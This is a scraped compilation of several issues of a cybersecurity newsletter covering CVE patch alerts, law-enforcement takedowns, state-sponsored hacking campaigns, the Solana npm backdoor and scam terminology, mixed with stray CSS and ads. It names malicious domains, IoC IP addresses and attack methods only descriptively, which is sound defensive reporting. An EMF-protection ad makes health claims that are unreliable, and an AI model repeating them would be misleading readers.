💔 Why the Shift?

The term "pig butchering" shames and dehumanizes victims, discouraging them from seeking help.

"Romance baiting" highlights the scammers' tactics and shifts focus to their criminal actions.

📜 Background

Originating in China (2016), the scam is based on the term "杀猪盘" ("shā zhū pán"), meaning "pig butchering."

Scammers build trust over time, often via social media or dating apps, before stealing victims' funds through fake investments.

🌍 A Broader Problem

These schemes are linked to organized crime groups in Southeast Asia.

Victims aren’t limited to financial loss; some scammers are forced into these operations under trafficked labor conditions.

🛠️ Sophisticated Tactics

Fraudsters use convincing apps and websites built by tech teams to mimic real trading platforms.

Google has also taken action, suing app developers involved in these schemes.

🗣️ Words Matter

INTERPOL emphasizes the importance of respectful language, similar to evolving terms for domestic violence and child exploitation.

  • "Romance baiting" focuses on empathy for victims and accountability for scammers.

  • "It’s time to prioritize respect and hold fraudsters accountable," said Cyril Gout, Acting Executive Director of Police Services.

💡 Key Takeaway 

Shifting language can reduce stigma, encourage reporting, and focus on stopping scammers. Always verify investments and be cautious of unsolicited online relationships! 💻❤️

They finally Meta their match 😏

🚨 Meta Fined €251M for 2018 Data Breach Impacting Millions 💸

Meta Platforms, the parent company of Facebook, has been fined €251 million ($263 million) by the Irish Data Protection Commission (DPC) for a 2018 breach that affected 29 million accounts globally, including 3 million in the EU and EEA.

🛡️ What Happened?

  • The breach, disclosed in September 2018, stemmed from a "View As" feature bug introduced in July 2017.

  • Attackers exploited the feature to obtain access tokens, gaining unauthorized entry to accounts and exposing personal data like names, emails, phone numbers, and posts.

📜 GDPR Violations

The DPC cited Meta for failing to:

  1. Include necessary details in its breach notification.

  2. Properly document and remedy the breach.

  3. Protect data in system design.

  4. Limit data processing to specific purposes.

💡 Key Takeaways

  • The DPC emphasized the importance of data protection in system design to prevent harm.

  • This marks Meta's second penalty from the DPC, following a €91M fine in September 2024 for another security lapse.

🌍 Broader Implications

Meta is also addressing privacy concerns globally, agreeing to a AU$50M settlement in Australia for misuse of personal data tied to the 2018 Cambridge Analytica scandal.

These cases underline the increasing accountability tech giants face for privacy violations under GDPR and other global frameworks.

🗞️ Extra, Extra! Read all about it! 🗞️

Every few weeks, we carefully select three hot newsletters to show you. Reputation is everything, so any links we share come from personal recommendation or carefully researched businesses at the time of posting. Enjoy!

  • 🛡️ Tl;dr sec: Join 30,000+ security professionals getting the best tools, blog posts, talks, and resources right in their inbox for free every Thursday 📅

  • 💵Crypto Pragmatist: Crypto made simple. Actionable alpha in 5 minutes, 3x a week. Join 47,000+ investors and insiders, for 🆓

  • 📈Bitcoin Breakdown: The best in Bitcoin, carefully curated by an alien from the future 👾

Let us know what you think.

So long and thanks for reading all the phish!

footer graphic cyber security newsletter

How do you protect your most critical business assets?

.bh__table, .bh__table_header, .bh__table_cell { border: 1px solid #C0C0C0; }
.bh__table_cell { padding: 5px; background-color: #FFFFFF; }
.bh__table_cell p { color: #2D2D2D; font-family: ‘Helvetica’,Arial,sans-serif !important; overflow-wrap: break-word; }
.bh__table_header { padding: 5px; background-color:#F1F1F1; }
.bh__table_header p { color: #2A2A2A; font-family:’Trebuchet MS’,’Lucida Grande’,Tahoma,sans-serif !important; overflow-wrap: break-word; }

Rubrik

Here’s how the Data Recovery Summit can help your business.
Beyond Backups: Redefining Database Resilience

🚨 Global DDoS Takedown: PowerOFF Operation Wreaks Havoc on cybercrime! 🌍

.bh__table, .bh__table_header, .bh__table_cell { border: 1px solid #C0C0C0; }
.bh__table_cell { padding: 5px; background-color: #FFFFFF; }
.bh__table_cell p { color: #2D2D2D; font-family: ‘Helvetica’,Arial,sans-serif !important; overflow-wrap: break-word; }
.bh__table_header { padding: 5px; background-color:#F1F1F1; }
.bh__table_header p { color: #2A2A2A; font-family:’Trebuchet MS’,’Lucida Grande’,Tahoma,sans-serif !important; overflow-wrap: break-word; }

Gone Phishing Banner

Welcome to Gone Phishing, your daily cybersecurity newsletter that treats cybercriminals like the government treats farmers 😬😬😬 

Patch of the Week! 🩹

First thing’s first, folks. Our weekly segment goes by many names. Patch of the Week, Tweak of the week. Okay, that’s it… 😳 

Congrats to WordPress’s Hunk plugin, the cybercriminals are no match… for your patch! 🩹

Check out this freshly hatched patch 🐣

What a Hunk of junk 😉 JK!

🚨 Critical WordPress Security Alert: Hunk Companion Plugin Vulnerability 🔌

A critical flaw in the Hunk Companion plugin (CVE-2024-11972, CVSS 9.8) is being actively exploited by attackers to install vulnerable plugins, paving the way for devastating attacks like Remote Code Execution (RCE), SQL Injection, and Cross-Site Scripting (XSS). 

🔑 What’s Happening?

  • Attackers are exploiting this flaw to install plugins like the now-closed WP Query Console, which has its own unpatched RCE vulnerability (CVE-2024-50498, CVSS 10.0).

  • This creates backdoors, manipulates databases, and allows the execution of malicious PHP code.

🛠️ Impacted Versions:

  • Hunk Companion: All versions before 1.9.0.

  • The flaw bypasses a previous patch (CVE‑2024‑9707, CVSS 9.8).

Fixed in:

Version 1.9.0

⚡ Action Required:

 Update Hunk Companion immediately to version 1.9.0 or later to close this vulnerability.

Review and remove any suspicious plugins or scripts on your site.

🔒 Why It’s Critical:

Exploiting outdated or abandoned plugins is a key tactic for attackers, turning weak points into opportunities for total site compromise.

Stay secure, and keep your WordPress site up to date! 🌐✨

Now, on to this week’s hottest cybersecurity news stories: 

  • 👮 Europol FTW! Smashes 27 DDoS platforms across 15 nations 🌍

  • 👾 Amadey is a weapon of MaaS disruption being deployed in Ukraine ☣️

  • 🖥️ Windows users beware! New malware could exploit Windows UI ⚠️

Europol: Can we crack it? DDoS we can! 🎶

🚨 Global DDoS Takedown: PowerOFF Operation Wreaks Havoc on cybercrime! 🌍

A massive international law enforcement operation called PowerOFF has struck a blow against DDoS-for-hire services! Authorities in 15 countries joined forces to dismantle 27 booter and stresser platforms like zdstresser.net, orbitalstress.net, and starkstresser.net.

🎯 Key Highlights:

💻 Services Down: These platforms, used for launching DDoS attacks, are offline!

🕵️ Arrests: Three alleged administrators were nabbed in France and Germany, and over 300 users are now on law enforcement radars.

🌐 Countries United: Australia, Brazil, Canada, Japan, and others participated in the takedown.

🔎 What Are Stresser Sites?

These shady platforms allowed hackers and hacktivists to flood websites with traffic, making them inaccessible. 

Customers could launch attacks for:

💰 Money

🎭 Hacktivism (think KillNet or Anonymous Sudan)

🕵️‍♂️ Sabotage 

🚨 A Wake-Up Call for Businesses:

🛡️ With the takedown of these services, law enforcement is sending a clear message:

💔 Don’t rely on illegal stresser services—they might just lead back to you.

🔒 Strengthen your defenses against DDoS attacks.

🚀 Keep your security updated to counter emerging threats like Breaking WAF, a bug that bypasses web application firewalls.

🌐 The Bigger Picture:

This takedown comes amidst a surge in DDoS attacks, especially during high-traffic periods like Black Friday. According to Cloudflare, the most targeted industries in 2024 included Gambling, Finance, and Telecom.

🎉👏 A Victory for Cybersecurity! 

The success of Operation PowerOFF shows that when nations unite 🌏, they can dismantle even the most complex cybercrime networks. For now, the internet breathes a little easier.

🚦Stay vigilant and stay secure! 💪✨

Start learning AI in 2025

Everyone talks about AI, but no one has the time to learn it. So, we found the easiest way to learn AI in as little time as possible: The Rundown AI.

It's a free AI newsletter that keeps you up-to-date on the latest AI news, and teaches you how to apply it in just 5 minutes a day.

Plus, complete the quiz after signing up and they’ll recommend the best AI tools, guides, and courses – tailored to your needs.

Sign up to start learning.

Amadeyzzz bruv 💀

🚨 Russian Cyber Espionage Alert: Secret Blizzard's Deceptive Tactics in Ukraine! 🎯

🕵️‍♂️ The Russian nation-state actor Secret Blizzard (aka Turla) is back in the spotlight, leveraging tools from other hacking groups to deploy the Kazuar backdoor against Ukrainian targets. Microsoft's latest report unveils a sophisticated and deceptive operation aimed at espionage and intelligence collection.

💡 Key Insights:

Hijacked Tools: Secret Blizzard used the Amadey bot malware to infiltrate Ukrainian military systems between March and April 2024.

🧩 Layered Attacks: Amadey was employed to download the Tavdig backdoor, which then installed an updated Kazuar variant.

🐾 Shadowy Operations: This marks the second instance since 2022 where Secret Blizzard leveraged another group's campaign to mask its tracks.

🔍 A Tactical Playbook of Deception

Secret Blizzard is known for covert and long-term intelligence gathering targeting:

🌍 Government offices, embassies, and ministries of foreign affairs.

🛡️ Defense departments and military-linked organizations.

Their methods include:

🌐 Watering Hole Attacks (compromising websites to target visitors).

📧 Spear-Phishing campaigns.

🕶️ Adversary-in-the-Middle (AitM) attacks. 

🚨 The Role of Amadey Malware-as-a-Service (MaaS):

  • Access Techniques: Secret Blizzard may have stealthily accessed Amadey C2 panels or purchased access through the dark web.

  • Customized Payloads: A PowerShell dropper delivered encoded malware, contacting a Turla-controlled C2 server for further exploitation. 

🛡️ Why This Matters:

Secret Blizzard’s strategy of commandeering tools from other actors—like Flying Yeti's COOKBOX backdoor—obscures its tracks and complicates attribution.

💻 Their adaptability in using shared or hijacked infrastructures frustrates threat analysts and enables stealthier campaigns.

🌍 Global Cybersecurity Implications

Evolving Espionage: The use of third-party access is a rare but increasingly effective obfuscation tactic. 

🛡️ Resilience Required: Organizations need robust defenses, including endpoint monitoring and real-time threat intelligence, to detect sophisticated multi-layered attacks. 

🔒 Final Thought:

Secret Blizzard’s operations reveal the lengths nation-state actors will go to remain undetected while achieving their goals. 🌐 Stay vigilant, adopt proactive security measures, and watch for evolving tactics in the cyber threat landscape! 💪✨

Discover the Secret Behind Elite Athletes' Seeking Peak Performance: The Advanced Tech Supporting Their Mental Clarity and Recovery

Elite performers demand peak performance from their bodies, and optimizing health is essential for achieving that edge. Our cutting-edge EMF protection technology is designed to help athletes shield themselves from the harmful effects of electromagnetic radiation, which can lead to fatigue, decreased recovery time, and impaired focus. By using Aires Tech products, athletes can minimize exposure to EMF from the devices they rely on daily—whether it's training gear, wearable tech, or even smartphones—allowing them to focus on maximizing their physical and mental capabilities. An official partner of UFC, WWE and Canada Basketball, Aires is committed to protect and optimize elite athletes through innovation and performance excellence.

Learn More

Hackers see a Window of opportunity 👨🏻‍💻 

🚨 Windows UI Automation: A Stealthy New Cyber Threat ⚡

💻 Cybersecurity researchers have uncovered a method to exploit the Windows UI Automation (UIA) framework for malicious purposes while bypassing endpoint detection and response (EDR) systems.

🔑 Key Takeaways

  • What It Does: Malicious programs can use UIA to:

  • Execute stealthy commands.

  • Harvest sensitive data (e.g., payment info).

  • Manipulate messaging apps like Slack or WhatsApp.

  • Redirect browsers to phishing sites.

  • Attack Scope: Local attackers can exploit UIA to control or interact with apps remotely by leveraging Component Object Model (COM) mechanisms.

🧩 How It Works

UIA, designed for assistive tech and automated testing, interacts with UI elements at high privilege levels when granted administrator permissions. These interactions can be exploited to read/write data or execute commands silently.

⚠️ Why It’s Dangerous

Defender Blindspot: Windows sees these malicious actions as intended features, not threats, allowing them to bypass defenses.

Hidden Interactions: Attackers can interact with UI elements not visible on the screen, enabling covert data theft or command execution.

🔐 DCOM: Another Threat Vector

In parallel, researchers at Deep Instinct uncovered a method to abuse the Distributed COM (DCOM) protocol for lateral movement: 

  • Custom Payloads: Attackers can write DLLs, create backdoors, and execute arbitrary code.

  • Indicators of Compromise (IoCs): Though detectable, these attacks require the attacker and victim to be in the same domain. 

🛡️ Stay Protected 

Organizations should:

  • Monitor for unusual COM/DCOM activity.

  • Restrict admin-level privileges where possible.

  • Strengthen defenses against UI and accessibility abuse.

🌐 Takeaway: These findings underscore the creative exploitation of legitimate tools for malicious purposes. Vigilance and proactive security measures are essential! 🚀

🗞️ Extra, Extra! Read all about it! 🗞️

Every few weeks, we carefully select three hot newsletters to show you. Reputation is everything, so any links we share come from personal recommendation or carefully researched businesses at the time of posting. Enjoy!

  • 🛡️ Tl;dr sec: Join 30,000+ security professionals getting the best tools, blog posts, talks, and resources right in their inbox for free every Thursday 📅

  • 💵Crypto Pragmatist: Crypto made simple. Actionable alpha in 5 minutes, 3x a week. Join 47,000+ investors and insiders, for 🆓

  • 📈Bitcoin Breakdown: The best in Bitcoin, carefully curated by an alien from the future 👾

Let us know what you think.

So long and thanks for reading all the phish!

footer graphic cyber security newsletter

Russian Money Laundering Networks Busted in International Crackdown

.bh__table, .bh__table_header, .bh__table_cell { border: 1px solid #C0C0C0; }
.bh__table_cell { padding: 5px; background-color: #FFFFFF; }
.bh__table_cell p { color: #2D2D2D; font-family: ‘Helvetica’,Arial,sans-serif !important; overflow-wrap: break-word; }
.bh__table_header { padding: 5px; background-color:#F1F1F1; }
.bh__table_header p { color: #2A2A2A; font-family:’Trebuchet MS’,’Lucida Grande’,Tahoma,sans-serif !important; overflow-wrap: break-word; }

Gone Phishing Banner

Welcome to Gone Phishing, your daily cybersecurity newsletter that can protect you from the cyberstorm, but not Storm Darragh. UK readers beware! 🌪️⛈️🚨 #RedWarning

Patch of the Week! 🩹

First thing’s first, folks. Our weekly segment goes by many names. Patch of the Week, Tweak of the week. Okay, that’s it… 😳 

Congrats to Veeam, the cybercriminals are no match… for your patch! 🩹

Check out this freshly hatched patch 🐣

🚨 Critical Security Alert for Veeam Users! 🙍🏻‍♂️

Veeam has patched a critical flaw (CVE-2024-42448, CVSS 9.9) in its Service Provider Console (VSPC) that could enable remote code execution (RCE) on vulnerable instances 💥.

🔑 Key Details:

Exploitation requires an authorized management agent on the server.

A second flaw (CVE-2024-42449, CVSS 7.1) could leak NTLM hashes and delete files ⚠️.

🛠️ Impacted Versions:

 VSPC 8.1.0.21377 and all earlier versions of builds 7 and 8.

✅ Fixed in:

 Version 8.1.0.21999

⚡ Action Required:

There are no mitigations. Update immediately to protect against potential exploits, especially as Veeam products are often targeted by ransomware operators 🔐. 

Stay safe and secure your systems today! 🌐✨

Now, on to this week’s hottest cybersecurity news stories: 

  • 👮🏻‍♂️ UK crypto squad arrests 84, seizes $20M in Operation Destabilise 💥

  • 🏰 Europol takes down the MATRIX invite-only criminal messaging service 👩🏻‍💻

  • 🚪 Backdoor discovered in Solana’s popular Web3.js npm library 📚

Elon Musk Reaction GIF by Saturday Night Live

Gif by snl on Giphy

Destabilise to the Moon 🚀📈😂

🚨 Russian Money Laundering Networks Busted in International Crackdown 🌍

The U.K. National Crime Agency (NCA) has led a massive global investigation, Operation Destabilise, targeting Russian money laundering networks linked to organized crime across the U.K., the Middle East, Russia, and South America.

🏆 Major Wins:

🕵️ 84 arrests connected to the Smart Group and TGR Group, two Russian-speaking money laundering networks.

💰 Seized £20 million ($25.4M) in cash and cryptocurrency.

💡 How They Operated:

🏢 Based in Moscow's Federation Tower, a known hub for money laundering.

💳 Provided illicit financial services, including:

  • Laundering funds for sanctioned Russian elites.

  • Converting cash to cryptocurrency and vice versa.

  •  Facilitating the purchase of property in the U.K. for Russian elites.

🗽 U.S. Treasury Steps In:

The U.S. Treasury's OFAC sanctioned five individuals and four entities tied to the TGR Group.

🛑 TGR’s Role: Helping Russian elites evade sanctions using cryptocurrency and stablecoins to funnel wealth back to the Kremlin.

🔥 Key Player: Ekaterina Zhdanova

  • Head of the Smart Group.

  •  Previously sanctioned for laundering $2.3 million in proceeds for the Ryuk ransomware group.

  • Allegedly supported Russian espionage operations and cybercrime syndicates.

🌐 Broader Implications:

 For the first time, investigators uncovered:

 🧵 A clear link between Russian elites, crypto-funded cybercriminals, and UK street-level drug gangs.

🔐 "Smart and TGR acted as a financial bridge, enabling Russian elites to bypass sanctions and access Western economies," the NCA said.

This operation highlights the role of illicit financial networks in sustaining cybercrime, espionage, and organized crime worldwide. 🕶️

Learn AI in 5 Minutes a Day

AI Tool Report is one of the fastest-growing and most respected newsletters in the world, with over 550,000 readers from companies like OpenAI, Nvidia, Meta, Microsoft, and more.

Our research team spends hundreds of hours a week summarizing the latest news, and finding you the best opportunities to save time and earn more using AI.

Sign up with 1-Click

The Matrix has you… 👩🏻‍💻

Europol: hold my beer 💪

 🚨 Encrypted Messaging Service MATRIX Dismantled in Europol Operation 📱

Europol has taken down MATRIX, an encrypted messaging platform built specifically for criminal activities. The operation, codenamed Passionflower, was spearheaded by French and Dutch authorities, marking a major victory against organized crime.

💀 The Takedown:

🌍 Global Reach: Over 8,000 users across the world paid $1,360–$1,700 in cryptocurrency for MATRIX-enabled devices.

📱 Authorities intercepted 2.3 million messages in 33 languages, uncovering crimes like drug trafficking, arms smuggling, and money laundering.

🎯 Key Arrests:

  •  A 52-year-old Lithuanian identified as MATRIX’s owner and manager.

  • Two others apprehended in Spain, alongside seizures of €145,000 in cash, €500,000 in cryptocurrency, 970 phones, and more.

🕵️ Inside MATRIX:

🔒 Not to be confused with matrix.org (a legit, open-source app).

📱 Offered video calls, anonymous browsing, and secure transaction tracking via customized Google Pixel phones.

🌍 Ran on over 40 servers worldwide, primarily in France and Germany, which have now been seized.

🌐 The Bigger Picture:

Europol notes a shift in the encrypted crime landscape after the fall of other platforms like Sky ECC, EncroChat, and Ghost. Criminals are now resorting to less-established or custom-built tools, but the takedown proves authorities are keeping up with these evolving technologies.

🔐 Key Takeaway:

These actions show law enforcement's growing capability to disrupt criminal tech. While new, fragmented platforms are harder to track, takedowns like these send a clear message: nowhere is safe for digital criminals.

Leading the Future of Finance

  • C$152M YTD revenue.

  • Expanding global reach.

  • Zero-debt growth strategy.

Learn More

Solana palava 🙃

🚨💻 Critical Software Supply Chain Attack Hits Popular Solana Library

A malicious supply chain attack has targeted the widely used @solana/web3.js npm library, compromising developers and crypto wallets. The attack, which exploited versions 1.95.6 and 1.95.7, could steal private keys, putting funds at risk.

🔍 The Key Details:

What Happened? Hackers injected malicious code into the library, harvesting private keys to drain cryptocurrency wallets. The compromised versions were available for a short window on December 2, 2024, and have since been removed.

The Malicious Mechanism: Threat actors used a backdoor function (addToQueue) to exfiltrate private keys via Cloudflare headers to a server at sol-rpc[.]xyz (now inactive).

Attack likely stemmed from a phishing attack that compromised a maintainer’s credentials.

Impact: Projects handling private keys directly (e.g., bots) were most affected.

Non-custodial wallets (e.g., traditional crypto wallets) were not vulnerable.

⚠️ Next Steps for Developers:

  1. Update Now: Move to version 1.95.8 or later immediately.

  2. Rotate Keys: If you suspect exposure, regenerate your private keys.

  3. Be Cautious: Avoid opening suspicious emails or links, especially from unknown sources.

📜 Broader Context:

🛠️ More Attacks on Open-Source Ecosystems

  • Fake Solana Libraries: Another package, solana-systemprogram-utils, rerouted 2% of transactions to attacker wallets, cleverly masking malicious behavior.

  •  Bogus Crypto Libraries: Fake npm packages like crypto-keccak and crypto-jsonwebtoken have siphoned credentials and crypto wallet data.

🧑‍💻 How It Happened

The phishing campaign used a fake npm website clone to steal login credentials and 2FA codes from a maintainer. Hackers transferred $164,100 (674.86 SOL) to their wallet before detection.

🛡️ The Bigger Challenge

Security experts emphasize the fragility of trust in open-source ecosystems. Social engineering attacks often target just a few developers but can have significant financial and operational impacts.

🔐 Takeaway:

This attack underscores the importance of vigilance in the software development pipeline. Developers must:

  • Regularly audit dependencies.

  • Employ robust account security (e.g., hardware-based 2FA).

  • Stay informed about potential risks in the open-source community.

  • Protect your code, your keys, and your wallet. 🛡️

🗞️ Extra, Extra! Read all about it! 🗞️

Every few weeks, we carefully select three hot newsletters to show you. Reputation is everything, so any links we share come from personal recommendation or carefully researched businesses at the time of posting. Enjoy!

  • 🛡️ Tl;dr sec: Join 30,000+ security professionals getting the best tools, blog posts, talks, and resources right in their inbox for free every Thursday 📅

  • 💵Crypto Pragmatist: Crypto made simple. Actionable alpha in 5 minutes, 3x a week. Join 47,000+ investors and insiders, for 🆓

  • 📈Bitcoin Breakdown: The best in Bitcoin, carefully curated by an alien from the future 👾

Let us know what you think.

So long and thanks for reading all the phish!

footer graphic cyber security newsletter

🚨 RomCom Exploits Firefox & Windows Zero-Days to Spread Malware 👾

.bh__table, .bh__table_header, .bh__table_cell { border: 1px solid #C0C0C0; }
.bh__table_cell { padding: 5px; background-color: #FFFFFF; }
.bh__table_cell p { color: #2D2D2D; font-family: ‘Helvetica’,Arial,sans-serif !important; overflow-wrap: break-word; }
.bh__table_header { padding: 5px; background-color:#F1F1F1; }
.bh__table_header p { color: #2A2A2A; font-family:’Trebuchet MS’,’Lucida Grande’,Tahoma,sans-serif !important; overflow-wrap: break-word; }

Gone Phishing Banner

Welcome to Gone Phishing, your daily cybersecurity newsletter that’s as popular with hackers as Keir Starmer is with the British public 🙈🙈🙈 

Patch of the Week! 🩹

First thing’s first, folks. Our weekly segment goes by many names. Patch of the Week, Tweak of the week. Okay, that’s it… 😳 

Congrats to WordPress, the cybercriminals are no match… for your patch! 🩹

Check out this freshly hatched patch 🐣

Stop the WordPresses 📰 

🚨 WordPress Security Alert! ⚠️ 

Two critical vulnerabilities (CVSS 9.8) in the Spam protection, Anti-Spam, and FireWall plugin by CleanTalk could let attackers install malicious plugins and even achieve remote code execution 💥.

🔓 Vulnerabilities:

  • CVE-2024-10542: Authorization bypass via DNS spoofing 🌐

  • CVE-2024-10781: API key bypass, allowing unauthorized plugin installations 🔑

These flaws affect versions up to 6.44. The plugin is installed on 200,000+ WordPress sites 📊.

💡 Threats:

Install/activate vulnerable plugins

Execute malicious code 🐍

Redirect visitors, steal admin credentials, and inject malware 🛡️

🔥 Action Required:

Update to version 6.45 or later immediately to secure your site and block potential attacks! 🚀

Stay safe! 🌐✨

Now, on to this week’s hottest cybersecurity news stories: 

  • 💔 RomCom breaks the hearts of Firefox & Windows users 👾

  • 🌉 GLASSBRIDGE is a pro-China fake news network, says Google 🌐

  • 🦹‍♂️ Introducing HATVIBE & CHERRYSPY, the latest in Russian hackery 👨🏻‍💻

Hugh Grants them these names? 🍿🎥💘👀😉

🚨 RomCom Exploits Firefox & Windows Zero-Days to Spread Malware 👾

The Russia-linked hacker group RomCom has been caught exploiting two critical zero-day vulnerabilities to sneak its RomCom RAT backdoor into victims' systems without any clicks or interaction.

💥 The Vulnerabilities:

  • CVE-2024-9680 (🔥 9.8 CVSS) – A Firefox bug that lets hackers execute code remotely.

  • CVE-2024-49039 (⚡ 8.8 CVSS) – A flaw in Windows Task Scheduler that grants admin privileges.

🕵️ How It Works:

Hackers set up a fake website, economistjournal[.]cloud. Victims using outdated Firefox versions are automatically hit by the exploit, leading to a chain reaction:

💣 Firefox sandbox escape ➡️ Windows privilege escalation ➡️ RomCom RAT installed.

🌍 Who’s Affected? 

Mostly users in Europe and North America who unknowingly visited the booby-trapped site. 

🔐 Stay Safe:

✔️ Update Firefox & Windows now!

✔️ Watch out for suspicious websites or links.

✔️ Use strong security tools to spot weird activity.

"This zero-click exploit shows RomCom’s skill and determination to stay hidden and strike hard," warns cybersecurity experts.

Stay alert! 🛡️

The gold standard of business news

Morning Brew is transforming the way working professionals consume business news.

They skip the jargon and lengthy stories, and instead serve up the news impacting your life and career with a hint of wit and humor. This way, you’ll actually enjoy reading the news—and the information sticks.

Best part? Morning Brew’s newsletter is completely free. Sign up in just 10 seconds and if you realize that you prefer long, dense, and boring business news—you can always go back to it.

Join 4.3 Million Readers Now

Those in GLASSBRIDGEs… 😏

🚨 China-Backed Hacker Group Storm-2077 Targets U.S. Agencies 🎯

A newly identified Chinese state-sponsored threat actor, Storm-2077, is targeting U.S. government agencies and NGOs, with global attacks extending to industries like defense, aviation, telecom, and finance.

🎯 How They Attack:

💥 Exploit internet-facing devices using public vulnerabilities.

💻 Deploy Cobalt Strike and open-source malware like Pantegana and Spark RAT.

✉️ Use phishing emails to steal credentials and access sensitive data, including emails via cloud environments.

🔍 Why It Matters:

Storm-2077 isn’t just after data—it’s targeting critical infrastructure and sensitive communications that could advance espionage and sabotage efforts.

📰 Fake News Sites & Influence Operations

Meanwhile, Google flagged a pro-China propaganda network called GLASSBRIDGE, using fake news sites to spread pro-Beijing narratives.

🕵️ Fake PR firms like Shanghai Haixun Technology and Shenzhen Bowen Media disguise themselves as independent media outlets, planting content across subdomains of legitimate news sites.

⚠️ What You Can Do:

✔️ Update and secure internet-facing devices.

✔️ Be vigilant about phishing emails and suspicious links.

✔️ Verify news sources, especially content on unfamiliar subdomains. 

"Storm-2077 is the latest in a long line of advanced Chinese threat actors using evolving tactics to remain undetected," warns Microsoft. Stay alert and secure! 🔐

Why struggle with file uploads? Pinata’s File API is your fix

Simplify your development workflow with Pinata’s File API. Add file uploads and retrieval to your app in minutes, without the need for complicated configurations. Pinata provides simple file management so you can focus on creating great features.

Build now!

It’s the CHERRY 🍒 on the HAT 🎩 #hatvibes 💀

🚨 Russian-Linked Hackers Launch Espionage Campaign 🌍

Threat actors tied to Russia, tracked as TAG-110, are targeting government agencies, human rights organizations, and educational institutions in Central Asia, East Asia, and Europe. This group overlaps with Ukraine's UAC-0063, linked to APT28 (Fancy Bear), a notorious Russian cyber-espionage crew.

🛠️ Tools of the Trade:

🎩 HATVIBE: A custom loader that delivers… 

🍒 CHERRYSPY: A Python-based backdoor used for data theft and espionage.

🎯 Target Regions:

  • Central Asia: Tajikistan, Kyrgyzstan, Kazakhstan, Turkmenistan, Uzbekistan. 

  • Other Hotspots: Armenia, China, Hungary, India, Greece, and Ukraine. 

📊 Over 62 victims across 11 countries have been identified, with a primary focus on Central Asia—likely to gather intel that supports Russia’s geopolitical ambitions.

🔍 How They Attack: 

⚙️ Exploit vulnerabilities in public-facing web apps like Rejetto HTTP File Server.

✉️ Use phishing emails to deploy HATVIBE, which then loads CHERRYSPY for spying.

🛡️ Broader Objectives:

TAG-110's actions align with Russia's ongoing strategy to:

🕵️ Gather intelligence on geopolitical developments.

🔌 Sabotage European critical infrastructure in NATO countries like Estonia, Finland, and Poland to destabilize Western alliances.

💣 Complement cyberattacks with physical sabotage as part of Russia's hybrid warfare doctrine, without directly provoking war with NATO. 

"These calculated attacks are designed to weaken NATO and maintain Russian influence in post-Soviet states," says Recorded Future. Expect increased aggression as tensions between Russia and the West continue to escalate. 🚨

🗞️ Extra, Extra! Read all about it! 🗞️

Every few weeks, we carefully select three hot newsletters to show you. Reputation is everything, so any links we share come from personal recommendation or carefully researched businesses at the time of posting. Enjoy!

  • 🛡️ Tl;dr sec: Join 30,000+ security professionals getting the best tools, blog posts, talks, and resources right in their inbox for free every Thursday 📅

  • 💵Crypto Pragmatist: Crypto made simple. Actionable alpha in 5 minutes, 3x a week. Join 47,000+ investors and insiders, for 🆓

  • 📈Bitcoin Breakdown: The best in Bitcoin, carefully curated by an alien from the future 👾

Let us know what you think.

So long and thanks for reading all the phish!

footer graphic cyber security newsletter

🚨 T-Mobile Confirms Targeting in Chinese Cyber-Espionage Campaign 🕵

.bh__table, .bh__table_header, .bh__table_cell { border: 1px solid #C0C0C0; }
.bh__table_cell { padding: 5px; background-color: #FFFFFF; }
.bh__table_cell p { color: #2D2D2D; font-family: ‘Helvetica’,Arial,sans-serif !important; overflow-wrap: break-word; }
.bh__table_header { padding: 5px; background-color:#F1F1F1; }
.bh__table_header p { color: #2A2A2A; font-family:’Trebuchet MS’,’Lucida Grande’,Tahoma,sans-serif !important; overflow-wrap: break-word; }

Gone Phishing Banner

Welcome to Gone Phishing, your daily cybersecurity newsletter that casts a wide old net and never pulls any punches cough Mike Tyson 🙈🥊🎣👀😁 

Patch of the Week! 🩹

First thing’s first, folks. Our weekly segment goes by many names. Patch of the Week, Tweak of the week. Okay, that’s it… 😳 

Congrats to PAN-OS, the cybercriminals are no match… for your patch! 🩹

Check out this freshly hatched patch 🐣

Don’t PANic! 😏

🚨 Palo Alto Networks Alert! ⚠️

A critical zero-day vulnerability (9.3 CVSS) in PAN-OS is under active exploitation. Attackers are deploying web shells to gain unauthorised remote access through vulnerable PAN-OS firewall management interfaces 🌐.

🔎 Indicators of Compromise (IoCs) IP addresses:

  • 136.144.17[.]*

  • 173.239.218[.]251

  • *216.73.162[.]

👇 Immediate Actions Needed:

1. Restrict Access: Limit management access to known IPs.

2. Update PAN-OS: Patch to 10.1.14-h6 through 11.2.4-h1 to resolve:

■ CVE-2024-9474 🚀 Privilege Escalation 

■ CVE-2024-0012 🔓 Auth Bypass

Palo Alto Networks is monitoring this as Operation Lunar Peek 👀. Remember, CISA mandates patching for Federal agencies by Dec 9.

💻 Patch now to stay protected! 🛡️

Now, on to this week’s hottest cybersecurity news stories: 

  • 🐉 Chinese hackers Salt Typhoon shakes up T-Mobile w/ espionage 🕵

  • 🐍 WhiteSnake and Meduza stealers delivered via BabbleLoader 👾

  • 👨🏻‍💻 Hackers exploit Black Friday shopping frenzy w/ fake discount sites 🛒FBI, Robot… 🤖

Salt Typhoon is T-ing up 🏌

🚨 T-Mobile Confirms Targeting in Chinese Cyber-Espionage Campaign 🕵

T-Mobile, a major U.S. telecom company, has confirmed that Chinese threat actors, Salt Typhoon (aka Earth Estries), targeted it in a months-long cyber-espionage campaign aiming to access sensitive communications from high-profile targets. This espionage effort appears focused on harvesting private data across major U.S. telecoms, including AT&T and Verizon.

Attack Details 🕵️‍♂️

Salt Typhoon, known for advanced persistence techniques, has been active since 2020 and recently intensified attacks on government and telecom sectors worldwide. 🌍

In this campaign, vulnerable software and misconfigured services were exploited to install custom backdoors and Cobalt Strike malware, enabling attackers to infiltrate networks undetected. 🚨

T-Mobile’s Response 🛡️

T-Mobile states that, so far, there’s no evidence of customer data being impacted. They are closely monitoring the situation and collaborating with authorities to prevent further breaches.

Salt Typhoon’s Tactics 🎩

Salt Typhoon’s attack strategies are known for their stealth and sophistication:

  • Access Techniques: They exploit vulnerabilities in systems like Microsoft Exchange and employ the China Chopper web shell to plant malware, then use cURL to download backdoor programs.

  • Persistence & Evasion: Using programs like NinjaCopy and PortScan, they maintain a foothold in compromised networks and obscure traffic through compromised servers.

Broader Implications 🌐

The U.S. government has warned of “broad and significant” attacks on American telecom infrastructures by the PRC, stressing the severity of potential data exposure and espionage risks.

This serves as a crucial reminder for industries to strengthen cybersecurity and continually monitor for vulnerabilities.

Novaxidil Triple Action Hair Regrowth Treatment

